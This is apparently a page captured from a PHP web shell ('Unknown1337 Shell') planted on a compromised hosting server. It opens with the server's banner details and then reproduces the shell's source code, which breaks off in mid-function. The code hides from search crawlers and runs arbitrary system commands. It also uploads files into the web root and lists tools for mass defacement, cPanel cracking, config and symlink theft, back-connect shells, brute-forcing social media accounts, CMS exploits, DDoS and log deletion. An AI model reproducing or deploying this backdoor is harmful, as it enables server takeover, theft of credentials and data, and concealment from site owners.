Server IP : 103.53.40.154 / Your IP : 18.191.237.228 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/ltbuildcon.com/../aanuwoolenenterprises.com/../biocareaqua.org/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
"<?php ##################################### # Unknown1337 # # Coded By Unknown1337 # # bapakuheker@protonmail.com # # 4ever only email :) # # Security? that just an illucions# # Lulz Ghost Team # ##################################### session_start(); error_reporting(0); set_time_limit(0); if(version_compare(PHP_VERSION, '5.3.0', '<')) { @set_magic_quotes_runtime(0); } @clearstatcache(); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); @ini_set('display_errors', 0); $color = "#00ff00"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'UTF-8'; if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } function login_shellbackdoor() { ?> <html> <head> <link rel="SHORTCUT ICON" href="https://k.top4top.io/p_22061rtwm7.png"> <title>xXx::.Unknown1337 Shell.::xXx/title> <style type="text/css"> html { background: #000000; color: green; } header { color: green; margin: 10px auto; } input[type=password] { width: 250px; height: 25px; color: red; background: #000000; border: 1px solid #ffffff; padding: 5px; margin-left: 20px; text-align: center; transition: box-shadow 0.4s ease-out, border 0.4s ease-out; -webkit-transition: box-shadow 0.4s ease-out, border 0.4s ease-out; -moz-transition: box-shadow 0.4s ease-out, border 0.4s ease-out; -ms-transition: box-shadow 0.4s ease-out, border 0.4s ease-out; } input[type=password]:focus { box-shadow: 0px 0px 5px #cc0000, 0px 0px 15px #ff0000, 0px 0px 25px #ff0000, 0px 0px 35px #cc0000; border: 1px solid #ff0000; } </style> </head> <header> <center> <style type="text/css"> #info-teja { z-index: 1000; background:-moz-linear-gradient(top, #1F2326, #555); background: -webkit-gradient(linear, left top, left bottom, from(#1F2326), to(#555)); box-shadow:-2px -2px 8px #202020, 2px 2px 20px #202020;-moz-box-shadow:-2px -2px 8px #202020, 2px 2px 20px #202020; -webkit-box-shadow:-2px -2px 8px #202020, 2px 2px 20px #202020; width:460px; position: fixed; top:150px; left:0; margin-left:-350px; border:1px solid #444; background-position:top right no-repeat; height:35px;font:11px Orbitron; color:#eee; border-top-right-radius:8px; border-bottom-right-radius:8px; -moz-border-radius-topright:8px; -moz-border-radius-bottomright:8px; -webkit-border-top-right-radius:8px; -webkit-border-bottom-right-radius:8px; } #info-teja{ -o-transition: all 1s ease-in; -moz-transition: all 1s ease-in; -webkit-transition: all 1s ease-in; } #info-teja:hover{ width:400px; opacity:1.0; margin-left:0; } .Tejainbox { border:1px solid #444; width:320px; margin:0px 90px 10px 10px; background:#000; color:#ffffff; border-radius :20px; padding:5px 0; -moz-border-radius:20px; -webkit-border-radius:20px; -o-transition:all 2s ease-in; -moz-transition:all 2s ease-in; -webkit-transition:all 2s ease-in; opacity:0.2; } .Tejainbox:hover{ opacity:1.0; box-shadow:1px 1px 15px #000; -moz-box-shadow: 1px 1px 15px #000; -webkit-box-shadow: 1px 1px 15px #000; background: #000; } .Tejainbox2 { margin:5px 10px; padding:0px 8px 10px; color:#FFFFFF; overflow:hidden; height:370px; } .teja15 { border-radius:15px; -moz-border-radius:15px; -webkit-border-radius:15px; } .Teja2 ul.bom { margin: 0; padding: 0; } .Tejainbox2 li { margin-left:20px; } .Tejainbox2 li a { color: #FFFFF; line-height: 4px; font-size: 11px; font-weight: bold; text-decoration:none; } .Tejainbox2 li a:hover { color: #428bca; text-shadow: 0 1px 1px #000; } .Tejainbox2 h2 { font: 18px Droid Serif; font-weight:bold; padding:0 8px; color: #fffff; text-shadow: 0px 1px 1px #ddd; border-bottom: 1px solid #202020; } .Tejatouch { font-size:21px; font-weight:bold; font-family:Arial Narrow; float:right; margin: 3px 10px 0 0; -o-transition: all 0.5s ease-out; -moz-transition: all 0.5s ease-out; -webkit-transition: all 0.5s ease-out; text-decoration:blink; } .Tejatouch:hover{ -o-transform: scale(2) rotate(720deg) translate(0px); -moz-transform: scale(2) rotate(720deg) translate(0px); -webkit-transform: scale(2) rotate(720deg) translate(0px); color: #fffff; }</style> <pre> <script type="text/javascript"> TypingText = function(element, interval, cursor, finishedCallback) { if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) { this.running = true; // Never run. return; } this.element = element; this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; }); this.interval = (typeof interval == "undefined" ? 100 : interval); this.origText = this.element.innerHTML; this.unparsedOrigText = this.origText; this.cursor = (cursor ? cursor : ""); this.currentText = ""; this.currentChar = 0; this.element.typingText = this; if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++; TypingText.all.push(this); this.running = false; this.inTag = false; this.tagBuffer = ""; this.inHTMLEntity = false; this.HTMLEntityBuffer = ""; } TypingText.all = new Array(); TypingText.currentIndex = 0; TypingText.runAll = function() { for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run(); } TypingText.prototype.run = function() { if(this.running) return; if(typeof this.origText == "undefined") { setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience. return; } if(this.currentText == "") this.element.innerHTML = ""; // this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text. if(this.currentChar < this.origText.length) { if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) { this.tagBuffer = "<"; this.inTag = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) { this.tagBuffer += ">"; this.inTag = false; this.currentText += this.tagBuffer; this.currentChar++; this.run(); return; } else if(this.inTag) { this.tagBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) { this.HTMLEntityBuffer = "&"; this.inHTMLEntity = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) { this.HTMLEntityBuffer += ";"; this.inHTMLEntity = false; this.currentText += this.HTMLEntityBuffer; this.currentChar++; this.run(); return; } else if(this.inHTMLEntity) { this.HTMLEntityBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else { this.currentText += this.origText.charAt(this.currentChar); } this.element.innerHTML = this.currentText; this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : ""); this.currentChar++; setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); } else { this.currentText = ""; this.currentChar = 0; this.running = false; this.finishedCallback(); } } </script> </pre> <div id="info-teja"><span class="Tejatouch" style="font-family:orbitron;font-size:18px">Credits:</span><div class="Tejainbox"><div class="Tejainbox2 teja15"> <h2><center> [+] We Are [+] </h2><br> <center><div id="contenttengah"><center> <img title="Unknown1337"src="https://k.top4top.io/p_22061rtwm7.png" width="70%"></div> </center> <span class="style4"> Shell Programmer: <br>Unknown1337</span><br><br> <span class="style4">Unknown1337: <br>SQL47.ID</span><br><br> <span class="style4">Official Member: <br>UnknownGho5t - Unknown7 - Unknown77 </span><br><br> <span class="style4">Greetz : <br> AnonSec Team </span> </div></div></div></td> </div> <?php $ServerName = $_SERVER['SERVER_NAME']; ?> <style> @import url(http://fonts.googleapis.com/css?family=Iceland); </style> <font color = "red" face = "Iceland" size = "6">Unknown1337 Bypass</font><br><br><br> <font style="font: 15pt Verdana; color: red;">Welcome Hackers!!</font><br><br> <table align="center" border="1" width="600" heigh> <tbody><tr> <td valign="top" background="http://dl.dropbox.com/u/10860051/images/matran."><p id="hack" style="margin-left: 3px;"> <font color="lime"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br> <font color="#FFF000"> Searching For Available Users . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br> <font color="#FFF000"> Users Found : <font color = 'red'>root@Unknown1337:~$ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font></font><br> <font color="lime"> Connecting To Our Master ^_^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br> <font color="#F00000"><font color="#FFF000">root@Unknown1337:~$</font> Connected ! </font><br> <font color="lime"> Detecting The Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br> <font color="lime"> Server Detected <font color="#FFF000"><?php echo $ServerName.": ~$" ?></font> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br> <font color="lime"> Trying To Connect To The Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br> <font color="#F00000"><font color="#FFF000"><?php echo $ServerName.": ~$" ?></font> Connected ! </font><br> <font color="#009900"><font color="#FFF000"><?php echo $ServerName.": ~$" ?></font><font color="lime"> Checking Server Command . . . . . . . . . . . . . . . . . . .</font> <br> <font color="#009900"><font color="#FFF000"><?php echo $ServerName.": ~$" ?></font><font color="lime"> Trying connect to Command . . . . . . . . . . .</font><br> <font color="#F00000"><font color="#FFF000"><?php echo $ServerName.": ~$" ?></font> Connected Command! </font><br> <font color="red">root@Unknown1337:~$ </font><font color="#FFF000"><?php echo "@". $ServerName ?><br></font><font color="red">Ready To Fuck Server :p</font> </tr> </tbody></table> <br> <script type="text/javascript"> new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; }); TypingText.runAll(); </script> </pre> </center> </header> <form method="post"> <center><input type="password" name="pass"><center> </form><br><br> <font color = "red" face = "Verdana">Visit Us! : https://LulzGhost-Team.site </font> <audio controls autoplay hidden> <source src="https://a.tumblr.com/tumblr_nc451eJAWg1tjcth4o1.mp3" type="audio/mpeg"> </audio><br><br> <font color = "red" face = "Verdana">@CopyRights LulzGhost Team2018 </font> <?php exit; } if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else login_shellbackdoor(); ?> <html> <head> <link rel="SHORTCUT ICON" href="https://k.top4top.io/p_22061rtwm7.png"> <title>xXx::. Unknown1337 Shell .::xXxx</title> <meta name='author' content='Unknown1337'> <meta charset="UTF-8"> <style type='text/css'> @import url(http://fonts.googleapis.com/css?family=Iceland); @import url("https://fonts.googleapis.com/css?family=Rajdhani"); @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono); hr { border:0; height:1px; background-image:linear-gradient(to right,rgba(0,0,0,0),rgb(255, 0, 0),rgba(0,0,0,0)) } html { background: #000000; color: #ffffff; font-family: 'Share Tech Mono'; font-size: 13px; width: 100%; } li { display: inline; margin: 1px; padding: 1px; } #menu a { padding:2px 10px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; padding: 2px 10px; margin: 0; background: #222222; text-decoration: none; letter-spacing: 2px; border-radius: 2px; border-bottom: 2px solid #e11a1a; border-top: 2px solid #e11a1a; border-right: 2px solid #e11a1a; border-left: 2px solid #e11a1a; } #menu a:hover { background:#180000; border-bottom:0px solid #333333; border-top:0px solid #333333; } table tr:first-child{ background: black; text-align: center; color: red; } table, th, td { border-collapse:collapse; font-family: Tahoma, Geneva, sans-serif; background: transparent; font-family: 'Share Tech Mono'; font-size: 13px; } .table_home, .th_home, .td_home { border: 0px solid red; } th { padding: 10px; } a { color: #ffffff; text-decoration: none; } a:hover { color: red; text-decoration: underline; } b { color: red; } input[type=text], input[type=password],input[type=submit] { background: transparent; color: #ffffff; border: 1px solid #ffffff; margin: 5px auto; padding-left: 5px; font-family: 'Share Tech Mono'; font-size: 13px; } input[type=submit] { background: transparent; color: #ffffff; border: 1px solid #ffffff; margin: 5px auto; padding-left: 5px; font-family: 'Share Tech Mono'; font-size: 13px; cursor:pointer; } textarea { border: 1px solid #ffffff; width: 100%; height: 400px; padding-left: 5px; margin: 10px auto; resize: none; background: transparent; color: #ffffff; font-family: 'Share Tech Mono'; font-size: 13px; } select { width: 152px; background: #000000; color: red; border: 1px solid #ffffff; margin: 5px auto; padding-left: 5px; font-family: 'Share Tech Mono'; font-size: 13px; } option:hover { background: red; color: #000000; } .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;} .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;} .infoweb { border-right: 1px solid #00FFFF; } </style> <style type="text/css"> @-webkit-keyframes spinner { from {-webkit-transform: rotateY(0deg);} to {-webkit-transform: rotateY(-360deg);} } @-ms-keyframes spinner { from {-ms-transform: rotateY(0deg);} to {-ms-transform: rotateY(-360deg);} } @-o-keyframes spinner { from {-o-transform: rotateY(0deg);} to {-o-transform: rotateY(-360deg);} } @keyframes spinner { from {transform: rotateY(0deg);} to {transform: rotateY(-360deg);} } @-moz-keyframes spinner { from {-moz-transform: rotateY(0deg);} to {-moz-transform: rotateY(-360deg);} } #stage { margin: 1em auto; -webkit-perspective: 1200px; -moz-perspective: 1200px; -ms-perspective: 1200px; perspective: 1200px; } #spinner, #spinner p { text-align: center; color: #fff; -webkit-animation-name: spinner; -webkit-animation-timing-function: linear; -webkit-animation-iteration-count: infinite; -webkit-animation-duration: 6s; -moz-animation-name: spinner; -moz-animation-timing-function: linear; -moz-animation-iteration-count: infinite; -moz-animation-duration: 6s; animation-name: spinner; animation-timing-function: linear; animation-iteration-count: infinite; animation-duration: 6s; -webkit-transform-style: preserve-3d; -moz-transform-style: preserve-3d; -ms-transform-style: preserve-3d; transform-style: preserve-3d; } #spinner:hover { -webkit-animation-play-state: paused; -moz-animation-play-state: paused; animation-play-state: paused; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:white; margin:0 4px; border:1px solid #444444; } .inputz:hover border-bottom:1px solid aqua; border-top:1px solid aqua; } .inputzbut:hover{ border-bottom:1px solid aqua; border-top:1px solid aqua; } </style> </head> <?php function w($dir,$perm) { if(!is_writable($dir)) { return "<font color=red>".$perm."</font>"; } else { return "<font color=lime>".$perm."</font>"; } } function r($dir,$perm) { if(!is_readable($dir)) { return "<font color=red>".$perm."</font>"; } else { return "<font color=lime>".$perm."</font>"; } } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; // change directory if(isset($_GET['y'])){ if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } } function hdd($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } if(get_magic_quotes_gpc()) { function idx_ss($array) { return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array); } $_POST = idx_ss($_POST); } error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); if(version_compare(PHP_VERSION, '5.3.0', '<')) { @set_magic_quotes_runtime(0); } if(isset($_GET['dir'])) { $dir = $_GET['dir']; chdir($dir); } else { $dir = getcwd(); } $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); $freespace = hdd(disk_free_space("/")); $total = hdd(disk_total_space("/")); $used = $total - $freespace; $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>"; $ds = @ini_get("disable_functions"); $open_basedir = @ini_get("Open_Basedir"); $safemode_exec_dir = @ini_get("safe_mode_exec_dir"); $safemode_include_dir = @ini_get("safe_mode_include_dir"); $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $mssql = (function_exists('mssql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $pgsql = (function_exists('pg_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $magicquotes = (function_exists('get_magic_quotes_gpc')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $ssh2 = (function_exists('ssh2_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $oracle = (function_exists('oci_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>All Functions Is Accessible </font>"; $show_obdir = (!empty($open_basedir)) ? "<font color=red>OFF</font>" : "<font color=lime>ON</font>"; $show_exec = (!empty($safemode_exec_dir)) ? "<font color=red>OFF</font>" : "<font color=lime>ON</font>"; $show_include = (!empty($safemode_include_dir)) ? "<font color=red>OFF</font>" : "<font color=lime>ON</font>"; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } echo "<center>"; echo "<br>"; echo "<img src = 'https://k.top4top.io/p_22061rtwm7.png' width = '110' height = '110' id='spinner'></img>"; echo "   "; echo "<font size='20px' color='red' face = 'Rajdhani'>$ Unknown1337 Shell $</font>"; echo " "; echo "<img src = 'https://k.top4top.io/p_22061rtwm7.png' width = '100' height = '100' id='spinner'></img>"; echo "<br><br>"; if($_POST['upload']) { if($_POST['tipe_upload'] == 'biasa') { if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>"; } else { $act = "<font color=red>failed to upload file</font>"; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['ix_file']['tmp_name'], $root)) { $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>"; } else { $act = "<font color=red>failed to upload file</font>"; } } else { $act = "<font color=red>failed to upload file</font>"; } } } echo " <form method='post' enctype='multipart/form-data'> <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ] <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br> <input type='file' name='ix_file'> <input type='submit' value='upload' name='upload'> </form>"; echo $act; echo "<hr color='red'></font></center>"; echo "<pre>"; echo "Server IP : <font color = 'red'>".$_SERVER['SERVER_ADDR']. "</font> Your IP :<font color ='red'> ".$_SERVER['REMOTE_ADDR']."</font><br>"; echo "Software : <font color = 'lime'>".$_SERVER['SERVER_SOFTWARE']."</font><br>"; echo "Kernel Version : <font color = 'lime'>".php_uname()."</font><br>"; echo "Storage Space : <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>"; echo "User / Group : <font color = 'lime'>".$user." (".$uid.") | ".$group." (".$gid.")</font><br>"; echo "Time On Server : <font color = 'lime'>".date("d M Y h:i:s a"). "</font><br>"; echo "Disable Functions : $show_ds<br>"; echo "Safe Mode : $sm<br>"; echo "PHP Version : <font color = 'lime'>".phpversion()." On ".php_sapi_name()."</font><br><br>"; echo "Open_Basedir: $show_obdir | Safe Mode Exec Dir: $show_exec | Safe Mode Include Dir: $show_include | <br>"; echo "MySQL: $mysql | MSSQL: $mssql | PostgreSQL: $pgsql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl | Magic Quotes: $magicquotes | SSH2: $ssh2 | Oracle: $oracle | <br>"; echo "</pre>"; echo "<form method='post'> <font color = 'red'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).": ~ $ </font> <input style='border: none; border-bottom: 1px solid #ffffff;' type='text' size='30' height='10' name='cmd'><input style='border: none; border-bottom: 1px solid #ffffff;' type='submit' name='do_cmd' value='>>'> </form>"; if($_POST['do_cmd']) { echo "<pre>".exe($_POST['cmd'])."</pre>"; } echo "</td></table>"; echo "<div id='menu'>"; echo "<hr color='red'>"; echo "<center>"; echo "<ul>"; echo "<li><a href='?' style = 'color:red';>Home</a></li>"; echo "<li> <a href='?dir=$dir&do=mass_deface'>Mass Tools</a> </li>"; echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>"; echo "<li> <a href='?dir=$dir&do=configv2'>Config V.2</a> </li>"; echo "<li> <a href='?dir=$dir&do=symlink'>Symlink</a></li>"; echo "<li> <a href='?dir=$dir&do=symlink2'>Symlink V.2</a> </li>"; echo "<li> <a href='?dir=$dir&do=symlink_python'>Symlink Python</a> </li>"; echo "<li> <a href='?dir=$dir&do=symconfig'>SymConfig</a> </li>"; echo "<li> <a href='?dir=$dir&do=adminer'>Adminer</a> </li> "; echo "<li> <a href='?dir=$dir&do=grabcpanel'>Grab Cpanel</a> </li>"; echo "<li> <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> </li><br><br>"; echo "<li> <a href='?dir=$dir&do=zoneh'>Zone-H</a> </li>"; echo "<li> <a href='?dir=$dir&do=defacerid'>Defacer.id</a> </li>"; echo "<li> <a href='?dir=$dir&do=multiconfig'>Multi Config</a> </li>"; echo "<li> <a href='?dir=$dir&do=cgi'>CGI Perl</a> </li>"; echo "<li> <a href='?dir=$dir&do=cgi2'>CGI Perl 2</a> </li>"; echo "<li> <a href='?dir=$dir&do=cgipy'>CGI Python</a> </li>"; echo "<li> <a href='?dir=$dir&do=network'>Back Connect</a> </li>"; echo "<li> <a href='?dir=$dir&do=backconnect'>Back Connect V.2</a> </li>"; echo "<li> <a href='?dir=$dir&do=jumping'>Jumping</a> </li>"; echo "<li> <a href='?dir=$dir&do=fake_root'>Fake Root</a> </li><br><br>"; echo "<li> <a href='?dir=$dir&do=auto_dwp'>Wp Auto Deface</a> </li>"; echo "<li> <a href='?dir=$dir&do=auto_dwp2'>Wp Auto Deface V.2</a> </li>"; echo "<li> <a href='?dir=$dir&do=auto_wp'>Wp Auto Edit Title</a> </li>"; echo "<li> <a href='?dir=$dir&do=hijack_wp'>Wp Auto Hijack</a> </li>"; echo "<li> <a href='?dir=$dir&do=jodexer'>Joomla Auto Deface</a></li>"; echo "<li> <a href='?dir=$dir&do=cpftp_auto'>Cpanel/Ftp Auto Deface</a></li>"; echo "<li> <a href='?dir=$dir&do=whois'>Whois</a></li><br><br>"; echo "<li> <a href='?dir=$dir&do=csrfup'>Csrf Exploiter</a></li>"; echo "<li> <a href='?dir=$dir&do=revslider'>RevSlider Mass Exploiter</a></li>"; echo "<li> <a href='?dir=$dir&do=elfinder'>Elfinder Mass Exploiter</a></li>"; echo "<li> <a href='?dir=$dir&do=lokomedia'>Lokomedia Mass Exploiter</a></li>"; echo "<li> <a href='?dir=$dir&do=drupal'>Drupal Mass Exploiter</a></li><br><br>"; echo "<li> <a href='?dir=$dir&do=ngindexx'>NginDexer</a> </li>"; echo "<li> <a href='?dir=$dir&do=vb'>VB Index Changer</a> </li>"; echo "<li> <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> </li>"; echo "<li> <a href='?dir=$dir&do=netsploit'>NetSploit</a> </li>"; echo "<li> <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> </li>"; echo "<li> <a href='?dir=$dir&do=whmcsdecod'>WHMCS Decoder</a></li>"; echo "<li> <a href='?dir=$dir&do=dbdump'>DB Dump</a> </li>"; echo "<li> <a href='?dir=$dir&do=code'>Inject Code</a> </li><br><br>"; echo "<li> <a href='?dir=$dir&do=jbrute'>BruteForce Joomla</a></li>"; echo "<li> <a href='?dir=$dir&do=wpbrute'>BruteForce Wordpress</a></li>"; echo "<li> <a href='?dir=$dir&do=fb'>BruteForce Facebook</a></li>"; echo "<li> <a href='?dir=$dir&do=emailbrute'>BruteForce Email</a></li>"; echo "<li> <a href='?dir=$dir&do=twitterbf'>BruteForce Twitter</a></li><br><br>"; echo "<li> <a href='?dir=$dir&do=auto_edit_user'>Mass User Changer</a> </li>"; echo "<li> <a href='?dir=$dir&do=title'>Mass Title Changer</a> </li>"; echo "<li> <a href='?dir=$dir&do=sqli-scanner'>SQLi Scanner</a></li>"; echo "<li> <a href='?dir=$dir&do=ports'>Port Scanner</a></li>"; echo "<li> <a href='?dir=$dir&do=cmsvuln'>CMS Vulnerability Scanner</a></li><br><br>"; echo "<li> <a href='?dir=$dir&do=string'>Encode/Decode</a> </li>"; echo "<li> <a href='?dir=$dir&do=hashid'>HashID</a> </li>"; echo "<li> <a href='?dir=$dir&do=hash'>Hash Generate</a> </li>"; echo "<li> <a href='?dir=$dir&do=domains'>Domains Viewer</a></li>"; echo "<li> <a href='?dir=$dir&do=reverse'>ReverseIP</a> </li>"; echo "<li> <a href='?dir=$dir&do=ddosattack'>DDOS</a> </li>"; echo "<li> <a href='?dir=$dir&do=adfin'>Admin Finder</a></li><br><br>"; echo "<li> <a href='?dir=$dir&do=bypass-cf'>Bypass CloudFlare</a></li>"; echo "<li> <a href='?dir=$dir&do=bypassserver'>Bypass Server</a></li>"; echo "<li> <a href='?dir=$dir&do=vhost'>Bypass vHost</a> </li>"; echo "<li> <a href='?dir=$dir&do=passwbypass'>Bypass Etc/Passwd</a> </li>"; echo "<li> <a href='?dir=$dir&do=cpftp_auto'>Bomb Mailer</a></li><br><br>"; echo "<li> <a href='?dir=$dir&do=zip'>Zip Menu</a></li>"; echo "<li> <a href='?dir=$dir&do=phpinfo'>PHP Info</a></li>"; echo "<li> <a href='?dir=$dir&do=loghunter'>Log Hunter</a></li>"; echo "<li> <a href='?dir=$dir&do=logs'>Delete Logs</a></li>"; echo "<li> <a href='?dir=$dir&do=contact'>Contact Me</a></li>"; echo "<li> <a href='?dir=$dir&do=about'>About Me</a></li><br><br>"; echo "<li> <a href='?shell&do=kill'>KillSelf</a></li> "; echo "<li> <a href='?byee&do=logout' style='color:red;'> Logout</a></li> "; echo "</ul>"; echo "</center>"; echo "<hr color='red'>"; echo "</div>"; echo "<br>"; echo "<center>"; echo "Current DIR: "; foreach($scdir as $c_dir => $cdir) { echo "<a href='?dir="; for($i = 0; $i <= $c_dir; $i++) { echo $scdir[$i]; if($i != $c_dir) { echo "/"; } } echo "'>$cdir</a>/"; } echo "[ ".w($dir, perms($dir))." ]"; echo "<br>"; echo "<br>"; if($_GET['do'] == 'grabcpanel') { @ini_set('display_errors',0); function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){ $ar0=explode($marqueurDebutLien, $text); 